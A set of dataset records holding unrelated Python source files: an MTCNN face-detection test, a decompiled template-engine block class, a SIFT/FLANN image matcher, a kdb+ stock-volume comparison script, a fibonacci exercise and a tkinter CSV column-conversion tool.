self.device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n        self.image = Image.fromarray(np.uint8(test_img[:, :, [2, 1, 0]])) # for croped transform cv2 to PIL\n        self.img = self.image # for pyramid\n        \n        self.pnet = net.PNet().to(self.device)\n        self.pnet.load_state_dict(torch.load(\"./params/pnet.pkl\"))\n        self.pnet.eval()\n        \n        self.rnet = net.RNet().to(self.device)\n        self.rnet.load_state_dict(torch.load(\"./params/rnet.pkl\"))\n        self.rnet.eval()\n\n        self.onet = net.ONet().to(self.device)\n        self.onet.load_state_dict(torch.load(\"./params/onet.pkl\"))\n        self.onet.eval()\n\n    def pyramid(self, scal=0.707):\n        \"resize the image to smaller size\"\n        w, h = self.img.size\n        self.img = self.img.resize((int(scal*w), int(scal*h)))\n        return self.img\n    \n    def p(self):\n        \"\"\"transform out of tensor to numpy\n        filter with confidence\n        calculate coordinates\n        filter with NMS\n        crop image from original image for RNet's input\n        draw\"\"\"\n        start_time = datetime.datetime.now()\n        r_prior, r_data = [], [] # collect RNet's prior, RNet's input\n        coordinates = [] # collect coordinates for draw\n        count = 0\n        while min(self.img.size) > 12:\n            scal = 0.707**count # 0.707 make the area half of origin image\n            input = tf.ToTensor()(self.img).unsqueeze(dim=0)-0.5\n            with torch.no_grad():\n                confi, offset = self.pnet(input.cuda())\n            confi, offset = confi.transpose(1, -1), offset.transpose(1, -1)\n\n            mask = confi[..., 0] > 0.9\n            confi = confi[mask].cpu().numpy() # filter confi\n            offset = offset[mask].cpu().numpy() # filter offset\n\n            index = mask.nonzero().cpu().numpy() # index \n            x_index, y_index = index[:, 1:2], index[:, 2:3]\n            x1, y1, x2, y2 
= x_index*2/scal, y_index*2/scal, (x_index*2+12)/scal, (y_index*2+12)/scal # top_left*scal=index*stride bottom_right*scal=top_left+12\n p_prior = np.hstack(([x1, y1, x2, y2])) # translate to numpy which ndim=2\n\n offset, landmarks = offset[:, :4], offset[:, 4:]\n offset, landmarks = utils.transform(offset, landmarks, p_prior)\n \n boxes = np.hstack((offset, confi, landmarks)) # [[offset+confi+landmarks]] for NMS\n boxes = utils.NMS(boxes, threshold=0.7, ismin=False)\n coordinates.extend(boxes.tolist())\n if boxes.shape[0] == 0:\n break\n\n data, prior = utils.crop_to_square(boxes[:, :5], 24, self.image)\n r_prior.extend(prior)\n r_data.extend(data)\n self.img = self.pyramid() \n count += 1 \n\n r_prior = np.stack(r_prior, axis=0) \n r_data = torch.stack(r_data, dim=0)\n end_time = datetime.datetime.now()\n print(\"PNet cost {}ms\".format((end_time - start_time).microseconds/1000))\n return r_data, r_prior\n \n def r(self):\n \"\"\"transform out of tensor to numpy\n filter with confidence\n calculate coordinates\n filter with NMS\n crop image from original image for ONet's input\n draw\"\"\"\n start_time = datetime.datetime.now()\n data, prior = self.p()\n with torch.no_grad():\n confi, offset = self.rnet(data.cuda())\n confi = confi.cpu().numpy().flatten()\n offset = offset.cpu().numpy()\n\n offset, prior, confi = offset[confi > 0.99], prior[confi > 0.99], confi[confi > 0.99]\n\n offset, landmarks = offset[:, :4], offset[:, 4:]\n offset, landmarks = utils.transform(offset, landmarks, prior)\n\n boxes = np.hstack((offset, np.expand_dims(confi, axis=1), landmarks))\n boxes = utils.NMS(boxes, threshold=0.6, ismin=False)\n \n o_data, o_prior = utils.crop_to_square(boxes[:, :5], 48, self.image)\n\n o_prior = np.stack(o_prior, axis=0) \n o_data = torch.stack(o_data, dim=0)\n end_time = datetime.datetime.now()\n print(\"RNet cost {}ms\".format((end_time - start_time).microseconds/1000))\n return o_data, o_prior\n \n def o(self):\n \"\"\"transform out of tensor to numpy\n filter with confidence\n calculate coordinates\n filter with NMS\n draw\"\"\"\n start_time = datetime.datetime.now()\n data, prior = self.r()\n with torch.no_grad():\n confi, offset = self.onet(data.cuda())\n confi = confi.cpu().numpy().flatten()\n offset = offset.cpu().numpy()\n\n offset, prior, confi = offset[confi >= 0.999], prior[confi >= 0.999], confi[confi >= 0.999]\n\n offset, landmarks = offset[:, :4], offset[:, 4:]\n offset, landmarks = utils.transform(offset, landmarks, prior)\n\n boxes = np.hstack((offset, np.expand_dims(confi, axis=1), landmarks)) # 将偏移量与置信度结合,进行NMS\n boxes = utils.NMS(boxes, threshold=0.4, ismin=True)\n end_time = datetime.datetime.now()\n print(\"ONet cost {}ms\".format((end_time - start_time).microseconds/1000))\n return boxes\n\n \nif __name__ == \"__main__\":\n FILE = \"F:/MTCNN_CeleA/test/video2.mp4\"\n FUNC = Test\n utils.show(FILE, FUNC, 20)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n \n\n\n \n\n\n\n","sub_path":"MTCNN_CeleA/test02.py","file_name":"test02.py","file_ext":"py","file_size_in_byte":5685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"489009676","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /cinje/block/generic.py\n# Compiled at: 2019-03-06 14:21:14\n# Size of source mod 2**32: 1805 bytes\n\n\nclass Generic(object):\n __doc__ = 'Block-level passthrough. 
Blocks must be terminated by \": end\" markers.\\n\\t\\n\\tSupport is included for chains of blocks of the expected types, without requiring \": end\" markers between them.\\n\\t\\n\\tThis block-level transformer handles: \"if\", \"elif\", and \"else\" conditional scopes; \"while\" and \"for\" loops,\\n\\tincluding the optional \"else\" clause to \"for\"; \"with\" context managers; and the exception management machinery of\\n\\t\"try\", \"except\", \"finally\", and \"else\". (Any given intermediary component is optional, of course.)\\n\\t\\n\\tSyntax::\\n\\t\\n\\t\\t: if ...\\n\\t\\t: elif ...\\n\\t\\t: else\\n\\t\\t: end\\n\\t\\t\\n\\t\\t: while ...\\n\\t\\t: end\\n\\t\\t\\n\\t\\t: for ...\\n\\t\\t: else\\n\\t\\t: end\\n\\t\\t\\n\\t\\t: with ...\\n\\t\\t: end\\n\\t\\t\\n\\t\\t: try\\n\\t\\t: except ...\\n\\t\\t: finally\\n\\t\\t: else\\n\\t\\t: end\\n\\t\\n\\tSingle-line conditionals and loops are not allowed, and the declaration should not include a trailing colon.\\n\\t'\n priority = 50\n _keywords = ('if', 'while', 'for', 'with', 'try')\n _continuation = ('elif', 'else', 'except', 'finally')\n _both = _keywords + _continuation\n\n def match(self, context, line):\n \"\"\"Match code lines prefixed with a variety of keywords.\"\"\"\n return line.kind == 'code' and line.partitioned[0] in self._both\n\n def __call__(self, context):\n \"\"\"Process conditional declarations.\"\"\"\n input = context.input\n try:\n declaration = input.next()\n except StopIteration:\n return\n else:\n stripped = declaration.stripped\n prefix, _ = declaration.partitioned\n if prefix in self._continuation:\n yield declaration.clone(line=(stripped + ':'), scope=(context.scope - 1))\n return\n yield declaration.clone(line=(stripped + ':'))\n context.scope += 1\n for i in context.stream:\n yield i\n\n context.scope -= 1","sub_path":"pycfiles/cinje-1.1.2-py2.py3-none-any/generic.cpython-37.opt-1.py","file_name":"generic.cpython-37.opt-1.py","file_ext":"py","file_size_in_byte":2205,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"460936448","text":"# -*- encoding: utf-8 -*-\n\n# 基于FLANN的匹配器(FLANN based Matcher)定位图片\nimport numpy as np\nimport cv2\nimport time\nfrom RealseCamera_before_svd import RealsenseCamera\n\n\ndef match_template(template_img, draw_img, target_kp, target_descrip, threshold, min_match_count=25):\n\tresult_img = draw_img.copy()\n\t\n\t# Initiate SIFT detector创建sift检测器\n\tsift = cv2.xfeatures2d.SIFT_create()\n\t\n\t# compute the descriptors with ORB\n\ttemplate_kp, template_des = sift.detectAndCompute(template_img, None)\n\t\n\t# 创建设置FLANN匹配\n\tFLANN_INDEX_KDTREE = 0\n\t# 匹配算法\n\tindex_params = dict(algorithm=FLANN_INDEX_KDTREE, trees=5)\n\t# 搜索次数\n\tsearch_params = dict(checks=30)\n\tflann = cv2.FlannBasedMatcher(index_params, search_params)\n\t\n\tmatches = flann.knnMatch(template_des, target_descrip, k=2)\n\t\n\t# store all the good matches as per Lowe's ratio test.\n\tgood_match = []\n\t# 舍弃大于threshold的匹配, threshold越小越严格\n\tfor m, n in matches:\n\t\tif m.distance < threshold * n.distance:\n\t\t\tgood_match.append(m)\n\tprint(\"matches found - %d/%d\" % (len(good_match), min_match_count))\n\t\n\tif len(good_match) > min_match_count:\n\t\t# 获取关键点的坐标\n\t\tsrc_pts = np.float32([template_kp[m.queryIdx].pt for m in good_match]).reshape(-1, 1, 2)\n\t\tdst_pts = np.float32([target_kp[m.trainIdx].pt for m in good_match]).reshape(-1, 1, 2)\n\t\t# 计算变换矩阵和MASK\n\t\tM, mask = cv2.findHomography(src_pts, dst_pts, cv2.RANSAC, 5.0)\n\t\tmatchesMask = 
mask.ravel().tolist()\n\t\th, w = template_img.shape[:2]\n\t\t# 使用得到的变换矩阵对原图像的四个角进行变换,获得在目标图像上对应的坐标\n\t\tpts = np.float32([[0, 0], [0, h - 1], [w - 1, h - 1], [w - 1, 0]]).reshape(-1, 1, 2)\n\t\tdst = cv2.perspectiveTransform(pts, M)\n\t\tcenter = np.asarray([np.mean(dst[:, 0, 0]), np.mean(dst[:, 0, 1])])\n\t\tprint('dst:', dst)\n\t\tprint('center:', center)\n\t\tresult_img = cv2.polylines(result_img, [np.int32(dst)], True, [0, 0, 255], 2, cv2.LINE_AA)\n\t\tresult_img = cv2.circle(result_img, (center[0], center[1]), 3, (0, 255, 0), 3)\n\telse:\n\t\tmatchesMask = None\n\t\n\treturn result_img\n\n\ndef test_match_thread(target_img, temp_img_ls):\n\tstart_time = time.time()\n\t\n\t# Initiate SIFT detector创建sift检测器\n\tsift = cv2.xfeatures2d.SIFT_create()\n\t\n\t# compute the descriptors with ORB\n\ttarget_kp, target_des = sift.detectAndCompute(target_img, None)\n\t\n\tfor template in temp_img_ls:\n\t\ttarget_img = match_template(template, target_img, target_kp, target_des, 0.8, min_match_count=15)\n\t\n\tprint('full_time', time.time() - start_time)\n\treturn target_img\n\n\nif __name__ == '__main__':\n\trealsense = RealsenseCamera()\n\t\n\ttemp_img_ls = [\n\t\tcv2.imread('imgdata/matchdata/template1.jpg'),\n\t\t# cv2.imread('imgdata/matchdata/template2.jpg'),\n\t\tcv2.imread('imgdata/matchdata/template4.jpg'),\n\t\tcv2.imread('imgdata/matchdata/template5.jpg')\n\t]\n\t\n\twhile True:\n\t\timage = realsense.get_color_image_from_frames(realsense.get_aligned_frames())\n\t\t\n\t\tresult_img = test_match_thread(image, temp_img_ls)\n\t\t\n\t\tcv2.imshow('result', result_img)\n\t\t\n\t\tkey = cv2.waitKey(1)\n\t\tif ord('q') == key or 27 == key:\n\t\t\tcv2.destroyAllWindows()\n\t\t\tbreak\n","sub_path":"sign_match_demo2_work.py","file_name":"sign_match_demo2_work.py","file_ext":"py","file_size_in_byte":3124,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"514232063","text":"# -*- coding: utf-8 -*-\nimport qpython\nfrom qpython import qconnection\nimport os\nimport pandas as pd\nimport numpy as np\nfrom datetime import datetime, timedelta\nimport re\n\n\ndef str2sym(x):\n return np.string_(x)\ndef int2str(x):\n return str(x)\ndef XSHG_Code(ticker):\n return str2sym('{0:>06s}.SH'.format(int2str(ticker)))\ndef XSHE_Code(ticker):\n return str2sym('{0:>06s}.SZ'.format(int2str(ticker)))\n\ndef DY_stck_Code(array_List):\n ticker = array_List['ticker']\n exchangecd = array_List['exchangecd']\n if exchangecd == 'XSHG':\n return XSHG_Code(ticker)\n else:\n return XSHE_Code(ticker)\n\n\ndef volume_compare(array_List):\n kdb_volume = array_List['volume']\n DataYes_colume = array_List['DY_volume']\n if kdb_volume == DataYes_colume:\n return 1\n else:\n return 2\n return \n\n\ndef getTradeDates(x):\n for parent,dirnames,filenames in os.walk(x):\n TradeDates=[]\n for filename in filenames:\n tradedate=re.compile(r'^equity_price([0-9]{8}).txt').findall(filename)\n if tradedate!= []:\n tradedate = datetime.strptime(tradedate[0],\"%Y%m%d\")\n TradeDates.append(tradedate)\n return TradeDates\n \n \n\n\nif __name__ == '__main__':\n print('start!')\n #取DYdata数据\n q = qconnection.QConnection(host='localhost', port=12345, pandas=True)\n q.open()\n rootdir = \"D:\\\\CE.Quants\\\\DQ\\\\testDYdata\\\\equity_price201811\"\n tradeDates = getTradeDates(rootdir)\n #print(tradeDates)\n count=1\n for tradeDate in tradeDates:\n print(tradeDate)\n \n DYmessage = 
pd.read_table(os.path.join('D:/CE.Quants/DQ/testDYdata/equity_price201811/','equity_price{0:%Y%m%d}.txt'.format(tradeDate)))\n #DYmessage = pd.read_table(os.path.join(os.getcwd(), 'test.txt'))\n #取出股票对应的ticker、shortnm公司简称、exchanged交易所、volume此处为总交易量\n DY_stock_msg = DYmessage.groupby(['ticker','shortnm','exchangecd']).agg({'volume':max}).reset_index()\n #print(DY_stock_msg)\n #print(type(DY_stock_msg))\n #DY_stock = DY_stock_msg.loc[(DY_stock_msg['exchangecd'] == 'XSHG') | (DY_stock_msg['exchangecd'] == 'XSHE')]\n DY_stock_msg['ticker'] = DY_stock_msg.apply(DY_stck_Code, axis=1)\n DY_stock_msg.rename(columns={'ticker':'sym','volume':'DY_volume'}, inplace=True)\n DY_stock_msg['DY_volume']= DY_stock_msg['DY_volume'].astype('float64')\n #print(DY_stock_msg)\n #print(type(DY_stock_msg))\n \n #\n kdb_Daily=q.sync('select date,sym,volume from Daily where date={0:%Y.%m.%d}'.format(tradeDate))\n #print(kdb_Daily)\n #print(type(kdb_Daily))\n \n kdb_DY_inner = pd.merge(kdb_Daily,DY_stock_msg, on='sym' , how='left')\n kdb_DY_inner['Is_equal'] = kdb_DY_inner.apply(volume_compare, axis=1)\n #print(kdb_DY_inner)\n stock_result=kdb_DY_inner.loc[kdb_DY_inner['Is_equal'] == 2]\n stock_result=stock_result.dropna()\n #print(stock_result)\n stock_result.to_csv(os.path.join('D:/CE.Quants/DQ/cpResult/201811','Stock_Result{0:%Y%m%d}.csv'.format(tradeDate)), index=False, encoding='utf-8')\n print(count)\n count = count +1\n \n","sub_path":"201812DataYESDQ/tempCodeRunnerFile.py","file_name":"tempCodeRunnerFile.py","file_ext":"py","file_size_in_byte":3262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"493452005","text":"#a = int(input(\"Enter a value of n: \"))\n# mydict = dict()\n#\n# def fib(n):\n# if n==0 or n==1:\n# return 1\n# else:\n# return fib(n-1) + fib(n-2)\n#\n#\n# print(fib(a))\n\n\n# to compute the fibonacci quickly for greater numbers\ndef new_fib(n,d):\n if n in d:\n return d[n]\n else:\n ans = new_fib((n-1),d) + new_fib((n-2),d) # calculates fib(n-1) and returns in d\n d[n] = ans # storing each computation of fib(n-1) in ans\n return ans\n\nd = {0:1, 1:2, 2:3, 3:4} # set base values for fibonacci, ie 0,1,1 - index positions 0,1,2\nprint(new_fib(1001,d))\n","sub_path":"fibonacci.py","file_name":"fibonacci.py","file_ext":"py","file_size_in_byte":593,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"630436697","text":"#==================================================\n# Version\t\t0.01\n#==================================================\n\nfrom tkinter import *\nfrom tkinter import ttk\nfrom tkinter import filedialog\nimport copy\n\nglobal DegComBox\nDegComBox = []\nglobal DegClkRowId\nDegClkRowId = 0\nglobal DegClkIndex\nDegClkIndex = 0\nglobal DegClkColumnId\nDegClkColumnId = 0\n\nglobal OpComBox\nOpComBox = []\nglobal OpClkRowId\nOpClkRowId = 0\nglobal OpClkIndex\nOpClkIndex = 0\nglobal OpClkColumnId\nOpClkColumnId = 0\n\nglobal DegSecList\nglobal OpSecList\nglobal read_raw\nglobal lineindex_time\nglobal filename #载入的文档路弿\nglobal TreeviewPst\nglobal TreeLineNum\nglobal ParList\nglobal DegList\nglobal OpList\nglobal DbClkFished\nglobal Precision\nDegSecList = ['保持','0.1','0.01','0.001','0.0001','0.00001','1','End']\nPrecision = [1.0, 0.1, 0.01, 0.001, 0.0001, 0.00001, 1.0, ]\nOpSecList = ['无操作','正负转换','取绝对值','End']\nDbClkFished = 1\nTreeLineNum = 666\nTreeviewPst = 0.0\nParList = []\nDegList = []\nOpList = []\n\n# 选择文件函数,并对Treeview的显示内容进行初始化\ndef SelectFile():\n global filename\n global 
TreeLineNum\n global read_raw\n global read_ripe\n global lineindex_time\n global filename\n \n varnum = 0\n InfoLabel.config(text=('Select file...'))\n filename = filedialog.askopenfilename()\n if filename == '':\n \tInfoLabel.config(text=('None file selected!'))\n \treturn\n dir.set(filename)\n # open the csv file\n with open(filename) as f_in:\n # lookup the line index of 时间\n read_raw = f_in.readlines()\n read_ripe = read_raw\n k = 0\n for line in read_raw:\n linelist = line.split(\",\")\n if linelist[0] == \"时间\":\n lineindex_time = k # the line number of the varname 时间/ U2-00/...\n varnum = len(linelist)\n # print(linelist)\n break # linelist is the varname 时间/ U2-00/...\n k = k + 1\n # LineNum = 100 #此处进行赋值,决定要创建多少行Entry类型文本柿\n i = 0\n \n # 删除原有Treeview里面的所有item,避免第二次选择插入项过多的问题\n if TreeLineNum != 666:\n \tTreeIidList = ParTreeview.get_children()\n \tfor item in TreeIidList:\n \t ParTreeview.delete(item)\n \t DegTreeview.delete(item)\n \t OpTreeview.delete(item)\n \n # 初始化插入Treeview的所有内容,并对tags和idd进行赋值。Tags用于改变底色。idd用于识别\n while i < varnum:\n ParList[i] = linelist[i]\n ParTreeview.insert('',i,values=(ParList[i]),tags='Par'+str(i),iid=str(i))\n DegTreeview.insert('',i,values=(DegList[i]),tags='Deg'+str(i),iid=str(i))\n OpTreeview.insert('',i,values=(OpList[i]),tags='Op'+str(i),iid=str(i))\n i = i + 1\n \n TreeLineNum = varnum\n \n # 对每个Treeview的每个item进行底色设置。\n for index in range(TreeLineNum):\n if(1 == (index % 2)):\n ParTreeview.tag_configure('Par' + str(index),background='#E0EFFF')\n else:\n ParTreeview.tag_configure('Par' + str(index),background='#FFFFFF')\n\n if(DegList[index] != DegSecList[0]):\n DegTreeview.tag_configure('Deg' + str(index),background='#D869FF')\n elif(1 == (index % 2)):\n DegTreeview.tag_configure('Deg' + str(index),background='#E0EFFF')\n else:\n DegTreeview.tag_configure('Deg' + str(index),background='#FFFFFF')\n\n if(OpList[index] != OpSecList[0]):\n OpTreeview.tag_configure('Op' + str(index),background='#D869FF')\n elif(1 == (index % 2)):\n OpTreeview.tag_configure('Op' + str(index),background='#E0EFFF')\n else:\n OpTreeview.tag_configure('Op' + str(index),background='#FFFFFF')\n \n InfoLabel.config(text=('Select file finished!'))\n BarSizeAutoSet(0)\n\n\n# 进行文件转换和写入操作\ndef ChangeFile():\n global read_raw\n global lineindex_time\n global read_ripe\n global TreeLineNum\n global Precision\n global DegSecList\n global DegList\n global OpList\n \n OperateLineNum = 0\n\n InfoLabel.config(text=('Start changing file ...'))\n \n read_ripe = copy.copy(read_raw)\n \n for i in range(TreeLineNum):\n if OpList[i] == '正负转换':\n print(i)\n # modify the data\n rowindex = i\n\n temp = 0\n while 1:\n if(DegSecList[temp] == 'End'):\n InfoLabel.config(text=('Precision Error!'))\n return\n elif(DegSecList[temp] == DegList[i]):\n break\n else:\n temp = temp +1\n prsition = Precision[temp]\n \n OperateLineNum = OperateLineNum + 1\n \n for index in range(lineindex_time + 1, len(read_raw)): #read_raw[( + 1):]:\n linelist = read_ripe[index].split(\",\")\n value = float(linelist[rowindex])\n if value < 0:\n value = value + 65536 * prsition\n value = round(value, 3)\n elif value > 32767 * prsition:\n value = value - 65536 * prsition\n value = round(value, 3)\n linelist[rowindex] = str(value)\n read_ripe[index] = ','.join(linelist)\n print(i) \n \n #write the data\n elif OpList[i] == '取绝对值':\n print(i)\n # modify the data\n rowindex = i\n \n OperateLineNum = OperateLineNum + 1\n \n for index in range(lineindex_time + 1, len(read_raw)): #read_raw[( + 1):]:\n linelist = 
read_ripe[index].split(\",\")\n value = float(linelist[rowindex])\n if value < 0:\n value = - value\n value = round(value, 3)\n linelist[rowindex] = str(value)\n read_ripe[index] = ','.join(linelist)\n print(i) \n # print(linelist)\n #write the data\n elif(TreeLineNum == (i - 1)):\n InfoLabel.config(text=('Operation Error!'))\n return\n \n if(0 == OperateLineNum):\n InfoLabel.config(text=('No Operation'))\n else:\n with open(filename + 'change.csv', 'w') as f_out:\n f_out.writelines(read_ripe)\n InfoLabel.config(text=('Operation finished!'))\n\ndef DegDbClear(event):\n global TreeLineNum\n DegClkRowId = DegTreeview.identify_row(event.y)\n DegClkColumnId = DegTreeview.identify_column(event.x)\n if(TreeLineNum == 666) or (DegClkRowId != ''):\n return\n\n for i in range(TreeLineNum):\n DegList[i] = DegSecList[0]\n DegTreeview.set(i ,DegClkColumnId, DegList[i])\n\n if(DegList[i] != DegSecList[0]):\n DegTreeview.tag_configure('Deg' + str(i),background='#D869FF')\n elif(1 == (i % 2)):\n DegTreeview.tag_configure('Deg' + str(i),background='#E0EFFF')\n else:\n DegTreeview.tag_configure('Deg' + str(i),background='#FFFFFF')\n\ndef OpDbClear(event):\n global TreeLineNum\n OpClkRowId = OpTreeview.identify_row(event.y)\n OpClkColumnId = OpTreeview.identify_column(event.x)\n if(TreeLineNum == 666) or (OpClkRowId != ''):\n return\n\n for i in range(TreeLineNum):\n OpList[i] = OpSecList[0]\n OpTreeview.set(i ,OpClkColumnId, OpList[i])\n\n if(OpList[i] != OpSecList[0]):\n OpTreeview.tag_configure('Op' + str(i),background='#D869FF')\n elif(1 == (i % 2)):\n OpTreeview.tag_configure('Op' + str(i),background='#E0EFFF')\n else:\n OpTreeview.tag_configure('Op' + str(i),background='#FFFFFF')\n\n# 双击Treeview改变值,有下拉框的版本中,该函数未使用\ndef DegDBClick(event):\n global TreeLineNum\n global DegList\n global DegSecList\n# item = DegTreeview.selection()[0]\n# index = DegTreeview.index(item)\n item = DegTreeview.identify_row(event.y)\n index = DegTreeview.index(item)\n \n DegIndex = DegSecList.index(DegList[index])\n if('End' == DegSecList[DegIndex + 1]):\n DegList[index] = DegSecList[0]\n else:\n DegList[index] = DegSecList[DegIndex + 1]\n \n DegTreeview.delete(item)\n DegTreeview.insert('',index,values=(DegList[index]),tags='Deg'+str(index),iid=str(index))\n\n if(DegList[index] != DegSecList[0]):\n DegTreeview.tag_configure('Deg' + str(index),background='#D869FF')\n elif(1 == (index % 2)):\n DegTreeview.tag_configure('Deg' + str(index),background='#E0EFFF')\n else:\n DegTreeview.tag_configure('Deg' + str(index),background='#FFFFFF')\n\n# 双击Treeview改变值,有下拉框的版本中,该函数未��用\ndef OpDBClick(event):\n global TreeLineNum\n global OpList\n global OpSecList\n item = OpTreeview.identify_row(event.y)\n index = OpTreeview.index(item)\n \n OpIndex = OpSecList.index(OpList[index])\n if('End' == OpSecList[OpIndex + 1]):\n OpList[index] = OpSecList[0]\n else:\n OpList[index] = OpSecList[OpIndex + 1]\n \n OpTreeview.delete(item)\n OpTreeview.insert('',index,values=(OpList[index]),tags='Op'+str(index),iid=str(index))\n\n if(OpList[index] != OpSecList[0]):\n OpTreeview.tag_configure('Op' + str(index),background='#D869FF')\n elif(1 == (index % 2)):\n OpTreeview.tag_configure('Op' + str(index),background='#E0EFFF')\n else:\n OpTreeview.tag_configure('Op' + str(index),background='#FFFFFF')\n\n# 滑块移动,对应三个Treeview同时进行上下滑动。有三种方式:拉滑块;点击滚动条;点击上下按钮\ndef BarMove(*Date):\n global TreeviewPst\n global TreeLineNum\n if 666 == TreeLineNum:\n return\n\n if DegComBox:\n DegComBox.destroy() \n if OpComBox:\n OpComBox.destroy()\n\n if(Date[0] == 'moveto'):\n BarPos 
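ChangeFile above undoes 16-bit unsigned wraparound on scaled register values, cell by cell. A self-contained sketch of that transform (the function name is mine, not the script's):

def unwrap_int16(value, precision):
    # Input is raw_uint16 * precision; fold the upper half of the unsigned
    # range back to negative numbers, mirroring the branches in ChangeFile.
    if value > 32767 * precision:
        value -= 65536 * precision
    elif value < 0:
        value += 65536 * precision
    return round(value, 3)

assert unwrap_int16(65535 * 0.1, 0.1) == -0.1  # raw 0xFFFF at 0.1 resolution is -0.1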
= float(Date[1])\n if(BarPos > (1.0-TreeviewPst)):\n BarPos = (1.0-TreeviewPst)\n elif(BarPos < 0):\n BarPos = 0\n startP=BarPos\n elif(Date[0] == 'scroll'):\n startP = float((bar.get())[0])\n if(Date[2] == 'pages'):\n if(Date[1] == '1'):\n startP = startP + TreeviewPst\n if(startP > (1.0 - TreeviewPst)):\n startP = 1.0 - TreeviewPst\n elif(Date[1] == '-1'):\n startP = startP - TreeviewPst\n if(startP < 0.0):\n startP = 0.0\n elif(Date[2] == 'units'):\n TreeUnit = 1.0 / TreeLineNum\n if(Date[1] == '1'):\n startP = startP + TreeUnit\n if(startP > (1.0 - TreeviewPst)):\n startP = 1.0 - TreeviewPst\n elif(Date[1] == '-1'):\n startP = startP - TreeUnit\n if(startP < 0.0):\n startP = 0.0 \n EndP = startP + TreeviewPst\n bar.set(str(startP),str(EndP))\n ParTreeview.yview(MOVETO,startP)\n DegTreeview.yview(MOVETO,startP)\n OpTreeview.yview(MOVETO,startP)\n\n# Paraview的点击事件,对应选中操作,并清除创建的下拉框\ndef ParClick(event):\n global TreeLineNum\n if(TreeLineNum == 666):\n return\n \n if DegComBox:\n DegComBox.destroy() \n if OpComBox:\n OpComBox.destroy()\n \n item = ParTreeview.identify_row(event.y)\n index = ParTreeview.index(item)\n DegTreeview.selection_set(item)\n OpTreeview.selection_set(item)\n ParTreeview.selection_set(item)\n \n if(DegList[index] != DegSecList[0]):\n DegTreeview.selection_remove(item)\n \n if(OpList[index] != OpSecList[0]):\n OpTreeview.selection_remove(item)\n\n# 按钮抬起操作,用于右边两个Treeview\ndef TreeButtonRelease(event):\n global TreeLineNum\n if(TreeLineNum == 666):\n return\n \n item = ParTreeview.identify_row(event.y)\n index = ParTreeview.index(item)\n DegTreeview.selection_set(item)\n OpTreeview.selection_set(item)\n ParTreeview.selection_set(item)\n \n if(DegList[index] != DegSecList[0]):\n DegTreeview.selection_remove(item)\n \n if(OpList[index] != OpSecList[0]):\n OpTreeview.selection_remove(item)\n \n# 下拉框选中值之后,对对应的Treeview进行操作,并清除当前的下拉框\ndef DegComBoxSeclected(*Date):\n global DegClkIndex\n global TreeLineNum\n global DegClkRowId\n global OpList\n \n DegList[DegClkIndex] = DegComBox.get()\n DegComBox.destroy()\n \n DegTreeview.delete(DegClkRowId)\n DegTreeview.insert('',DegClkIndex,values=(DegList[DegClkIndex]),tags='Deg'+str(DegClkIndex),iid=str(DegClkIndex))\n\n if(DegList[DegClkIndex] != DegSecList[0]):\n DegTreeview.tag_configure('Deg' + str(DegClkIndex),background='#D869FF')\n elif(1 == (DegClkIndex % 2)):\n DegTreeview.tag_configure('Deg' + str(DegClkIndex),background='#E0EFFF')\n else:\n DegTreeview.tag_configure('Deg' + str(DegClkIndex),background='#FFFFFF')\n\n# 精度所在的Treeview的点击操作,创建一个下拉框。\ndef DegClick(event):\n global DegComBox\n global TreeLineNum\n global DegClkRowId\n global DegClkIndex\n global DegClkColumnId\n if(TreeLineNum == 666):\n return\n \n if DegComBox:\n DegComBox.destroy() \n if OpComBox:\n OpComBox.destroy() \n \n DegClkRowId = DegTreeview.identify_row(event.y)\n DegClkColumnId = DegTreeview.identify_column(event.x)\n \n if(DegClkRowId == ''):\n return\n\n DegClkIndex = ParTreeview.index(DegClkRowId)\n \n x,y,width,height = DegTreeview.bbox(DegClkRowId, DegClkColumnId)\n pady = height // 2\n \n DegComBox = ttk.Combobox(DegTreeview, width=int(width/10))\n DegComBox.config(values = DegSecList)\n DegComBox.current(DegSecList.index(DegList[DegClkIndex]))\n DegComBox.place( x=x, y=y+pady,width=width, anchor=W)\n DegComBox.bind(\"<>\",DegComBoxSeclected)\n \n# 下拉框选中值之后,对对应的Treeview进行操作,并清除当前的下拉框\ndef OpComBoxSeclected(*Date):\n global OpClkIndex\n global TreeLineNum\n global OpClkRowId\n global OpList\n \n OpList[OpClkIndex] = OpComBox.get()\n 
OpComBox.destroy()\n \n OpTreeview.delete(OpClkRowId)\n OpTreeview.insert('',OpClkIndex,values=(OpList[OpClkIndex]),tags='Op'+str(OpClkIndex),iid=str(OpClkIndex))\n\n if(OpList[OpClkIndex] != OpSecList[0]):\n OpTreeview.tag_configure('Op' + str(OpClkIndex),background='#D869FF')\n elif(1 == (OpClkIndex % 2)):\n OpTreeview.tag_configure('Op' + str(OpClkIndex),background='#E0EFFF')\n else:\n OpTreeview.tag_configure('Op' + str(OpClkIndex),background='#FFFFFF')\n\n# Operation所在的Treeview的点击操作,创建一个下拉框。\ndef OpClick(event):\n global OpComBox\n global TreeLineNum\n global OpClkRowId\n global OpClkIndex\n global OpClkColumnId\n if(TreeLineNum == 666):\n return\n \n if DegComBox:\n DegComBox.destroy() \n if OpComBox:\n OpComBox.destroy() \n \n OpClkRowId = OpTreeview.identify_row(event.y)\n OpClkColumnId = OpTreeview.identify_column(event.x)\n \n if(OpClkRowId == ''):\n return\n\n OpClkIndex = ParTreeview.index(OpClkRowId)\n \n x,y,width,height = OpTreeview.bbox(OpClkRowId, OpClkColumnId)\n pady = height // 2\n \n OpComBox = ttk.Combobox(OpTreeview,width= int(width/10))\n OpComBox.config(values = OpSecList)\n OpComBox.current(OpSecList.index(OpList[OpClkIndex]))\n OpComBox.place( x=x, y=y+pady, width=width, anchor=W)\n OpComBox.bind(\"<>\",OpComBoxSeclected)\n\n# 根据窗口自动调整滑动条的滑块大小\ndef BarSizeAutoSet(event):\n global TreeviewPst\n global 